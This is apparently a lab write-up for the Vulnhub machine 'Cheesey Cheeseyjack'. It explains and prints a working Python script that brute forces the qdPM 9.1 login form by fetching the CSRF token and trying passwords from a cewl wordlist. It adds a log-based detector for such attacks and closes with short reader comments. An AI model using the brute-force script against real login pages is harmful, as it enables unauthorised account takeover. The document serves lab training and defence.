Python Scripting for Cybersecurity: A Guide to Brute Forcing qdPM 9.1
This is a Python 3 script that was created to solve a machine on Vulnhub called "Cheesey Cheeseyjack". You can see and follow the walkthrough of the solution for this machine on my profile. Specifically, it was made to brute force the login panel of qdPM 9.1. The "passwd.txt" file used in the script was created with "cewl", a tool that builds a small dictionary from the words found on the victim's website.
The script uses the "pwn" library (pwntools), a Python library with helper functions for exploit development; here it is used only for its progress bar. It also uses the "requests" library, which makes HTTP requests and session handling easier.
The first thing that the script does is define a signal handler to handle the SIGINT signal. This is done so that if the user decides to interrupt the script by pressing CTRL+C, the script will exit gracefully.
After defining the signal handler, the script defines a global variable called "login_url", which is the URL of the login page that the script will try to brute force.
Next, the script defines a function called "makeBruteForce". This function reads the "passwd.txt" file line by line and tries each password in turn to see if it is the correct password. The function also uses the "pwn" library to display a progress bar that shows the current progress of the brute force attack.
The function starts by opening the "passwd.txt" file and creating a progress bar with the label "Brute Force". It then sets the status of the progress bar to "Starting Brute Force Attack" and waits for 2 seconds.
Next, the function loops over each line in the "passwd.txt" file and tries each password in turn. It uses the "requests" library to create a new session and send a GET request to the login page. It then uses a regular expression to extract the CSRF token from the HTML response; this token must be included in the POST request that follows, otherwise qdPM rejects the form.
The function then creates a dictionary called "data_post" that contains the token, the email address, the current password, and the "http_referer" parameter. It then sends a POST request to the login page with the "data_post" dictionary as the data. If the response from the server contains the string "No match", then the current password is not correct, and the function moves on to the next password. If the response does not contain the string "No match", then the password is correct, and the function prints a success message that includes the password and exits the script.
Finally, the script checks whether the "__name__" variable equals "__main__". This is the Python convention for detecting whether the script is being run directly or being imported as a module. If the script is being run directly, the "makeBruteForce" function is called; if it is imported as a module, the function is not called.
#!/usr/bin/python3
from pwn import *          # pwntools: used only for the log.progress() bar
import requests, signal, sys, time, re

# Exit cleanly on CTRL+C instead of dumping a traceback
def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

# Login page of qdPM 9.1 on the target machine
login_url = "http://ipvictim/project_management/index.php/login"

def makeBruteForce():
    f = open("passwd.txt", "r")            # wordlist generated with cewl
    p1 = log.progress("Brute Force")
    p1.status("Starting Brute Force Attack")
    time.sleep(2)
    counter = 1
    for passwd in f.readlines():
        passwd = passwd.strip()
        # 148 is the number of lines in passwd.txt, hard-coded by the author
        p1.status("Trying Password [%d/148]: %s" % (counter, passwd))
        s = requests.session()
        # GET the form first to obtain the per-session CSRF token
        r = s.get(login_url)
        token = re.findall(r'_csrf_token]" value="(.*?)"', r.text)[0]
        data_post = {
            'login[_csrf_token]': token,
            'login[email]': 'ch33s3m4n@cheeseyjack.local',
            'login[password]': passwd,
            'http_referer': 'http://ipvictim/project_management/'
        }
        r = s.post(login_url, data=data_post)
        # qdPM answers a failed login with "No match" in the page body
        if "No match" not in r.text:
            p1.success("The password is %s" % passwd)
            sys.exit(0)
        counter += 1

if __name__ == '__main__':
    makeBruteForce()
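Seen from the server side, the exchange above shows up in the web server's access log as a burst of POST requests to the login path from a single client; because qdPM reports a failed login with "No match" in the page body rather than with a distinctive status code, the status field alone does not separate failures from successes. The following is an added example, not part of the original script or of qdPM, that flags that pattern over a few constructed Apache-style log lines. The log format, the login path (taken from login_url above), the client IPs and the threshold and window values are all assumptions.

```python
#!/usr/bin/python3
# Added example (not part of the original script): detect login brute forcing
# by counting POSTs to the qdPM login path per client IP inside a sliding
# time window, using constructed Apache-style access log lines.
import re
from collections import defaultdict, deque
from datetime import datetime

LOGIN_PATH = "/project_management/index.php/login"   # same path as login_url in the script

# Apache "combined"-style line: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {ip: peak_count} for every IP that sends at least `threshold` POSTs
    to LOGIN_PATH within any `window_seconds` sliding window.
    Status codes are deliberately ignored: a failed qdPM login still renders the
    form (the script above has to search the body for "No match")."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs still inside the window
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:        # skip unparseable lines instead of crashing
            continue
        ip, ts, method, path, status = parsed
        if method != "POST" or path != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        # drop timestamps that fell out of the window (log lines are in time order)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


def sample_log():
    """Constructed log: 10.0.0.5 hammers the form, 10.0.0.9 logs in once normally."""
    base = ('{ip} - - [10/Mar/2024:12:00:{sec:02d} +0000] '
            '"{method} {path} HTTP/1.1" {status} 512')
    lines = []
    for i in range(12):   # 12 POSTs in 22 seconds from one client
        lines.append(base.format(ip="10.0.0.5", sec=i * 2, method="POST",
                                 path=LOGIN_PATH, status=200))
    lines.append(base.format(ip="10.0.0.9", sec=5, method="GET", path=LOGIN_PATH, status=200))
    lines.append(base.format(ip="10.0.0.9", sec=9, method="POST", path=LOGIN_PATH, status=302))
    lines.append("this line does not parse and must be skipped")
    return lines


if __name__ == "__main__":
    for ip, count in find_bruteforce(sample_log()).items():
        print("[!] %s: %d login POSTs inside one window" % (ip, count))
```

The detector keys on path and method only, so it also catches wordlists that happen to guess correctly (the final POST of a successful attempt looks the same in the log). The threshold and window are tuning knobs: on a site where legitimate users rarely mistype more than a handful of times, 10 POSTs a minute from one address is a reasonable alert level, and the same count can be fed to a rate limiter or lockout policy on the application side.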
--
[2mo] There is no privacy without security
[2y] If you move the login_url and email variables inside the makeBruteForce() function, it can make it easier to change them if needed. You can also use enumerate() instead of manually incrementing the counter variable, and raise SystemExit instead of calling sys.exit(). For example: